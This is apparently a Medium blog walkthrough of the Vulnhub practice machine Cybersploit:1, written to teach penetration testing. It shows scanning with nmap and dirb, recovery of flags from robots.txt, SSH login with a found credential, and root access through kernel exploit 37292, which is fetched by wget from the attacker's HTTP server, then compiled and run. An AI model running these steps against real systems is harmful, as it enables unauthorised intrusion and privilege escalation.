Introduction
Step 1: Host Discovery
Step 2: Aggressive Network Scanning
Step 3: Web Application Enumeration
Step 4: SSH Access
Step 5: Privilege Escalation
Conclusion

Introduction

Cybersploit:1 is a vulnerable machine hosted on Vulnhub, designed to provide a practical experience in penetration testing. This walkthrough will guide you through each step to successfully compromise the target system and retrieve the necessary flags.

Step 1: Host Discovery

First, we need to identify the IP address of the target machine on our network. This can be accomplished using the netdiscover command.

netdiscover

After running the scan, we identify the target’s IP as 192.168.1.14.

Step 2: Aggressive Network Scanning

To gather detailed information about the target machine, we use the nmap tool in Aggressive mode. This mode sends a variety of probes to identify open ports and running services.

nmap -A 192.168.1.14

The scan reveals that only a few ports are open on the target machine:

Port 22: SSH Service
Port 80: HTTP Service

These open ports will be crucial in further exploration of the target machine.

Step 3: Web Application Enumeration

Given that port 80 is open, we start our enumeration by exploring the web application hosted on the target machine. Opening the IP address in a browser displays a basic webpage.

To dig deeper, we use dirb to enumerate possible files and directories on the web server:

dirb http://192.168.1.14/

Output:

The dirb scan returns a list of files and directories available on the web server. Among them, one file catches our attention: robots.txt.

Investigation of `robots.txt`:

The robots.txt file is commonly used to instruct web crawlers on which pages should not be indexed. However, it can also reveal sensitive information.

Access robots.txt:

Open http://192.168.1.14/robots.txt in a browser.

Content Analysis:

The file contains a string that appears to be encoded in Base64.

3. Decoding Base64:

We decode the Base64 string to reveal our first flag.

Decoding the string reveals our first flag

Flag1: cybersploit{youtube.com/c/cybersploit}

Step 4: SSH Access

While exploring the HTML source code of the web page, we find an interesting piece of information hidden in the comments: a username.

Username Discovery:

SSH User: itsskv

Given that the SSH service (port 22) is open, and we now have a valid username, we attempt to log in using SSH. Although we do not have the password, we hypothesize that the first flag we found could be used as the password.

SSH Login Attempt:

ssh itsskv@192.168.1.14

Password:

Get Anshika’s stories in your inbox

Join Medium for free to get updates from this writer.

cybersploit{youtube.com/c/cybersploit}

Success:

The SSH login is successful, and we now have access to the target machine as the user itsskv.

Post-Login Enumeration:

List Directory Contents:

We begin by listing the contents of the home directory using the ls command.

2. Discovery of flag2.txt:

Among the files in the directory, we find flag2.txt.

3. Read flag2.txt:

We use the cat command to view the contents of flag2.txt.

ls
cat flag2.txt

Output:

The contents of flag2.txt appear to be encoded. To read it in plain text, we use a binary-to-text decoder.

Flag 2:

cybersploit{https:t.me/cybersploit1}

With the second flag in hand, we now focus on escalating our privileges to root.

Step 5: Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions on a system, typically to achieve root access. We start by checking the kernel version of the target machine, which could potentially expose vulnerabilities.

Kernel Version Check:

uname -a

Press enter or click to view image in full size

Output:

The command output reveals that the target machine is running an older version of the Linux kernel. Such older versions are often vulnerable to various exploits.

Researching Exploits:

Using the information from the uname -a command, we search for known exploits that target the specific kernel version. A search on Exploit-DB returns multiple potential exploits.

Selected Exploit:

We choose an exploit that matches the kernel version. The exploit is identified by its Exploit-DB ID, 37292.c.

Exploit Execution:

Download the Exploit:

We host a simple HTTP server on our machine to transfer the exploit code to the target machine.

cat 37292.c
python3 -m http.server 8080

Download the Exploit on Target Machine:

wget http://192.168.1.8:8080/37292.c

Compile the Exploit:

The exploit is written in C, so we compile it using gcc on the target machine

ls
gcc 37292.c
ls

Run the Exploit:

Execute the compiled binary to attempt privilege escalation.

./a.out
whoami

Success:

The exploit successfully escalates our privileges to root.

Final Flag:

With root access, we navigate to the root directory and retrieve the final flag:

cd /root
ls
cat finalflag.txt

Final Flag: Retrieved successfully.

Conclusion

This walkthrough detailed the process of exploiting the Cybersploit:1 machine on Vulnhub. We started with network scanning to identify open services, then moved on to web application enumeration, where we uncovered important clues leading to SSH access. Finally, we escalated our privileges by exploiting a known vulnerability in the kernel, ultimately gaining root access and retrieving all the flags. This exercise highlights the importance of systematic enumeration, persistence, and the ability to leverage known vulnerabilities in achieving penetration testing goals.

Cybersploit :1 vulnhub walkthrough

Table of Contents

Introduction

Step 1: Host Discovery

Step 2: Aggressive Network Scanning

Step 3: Web Application Enumeration

Output:

Investigation of `robots.txt`: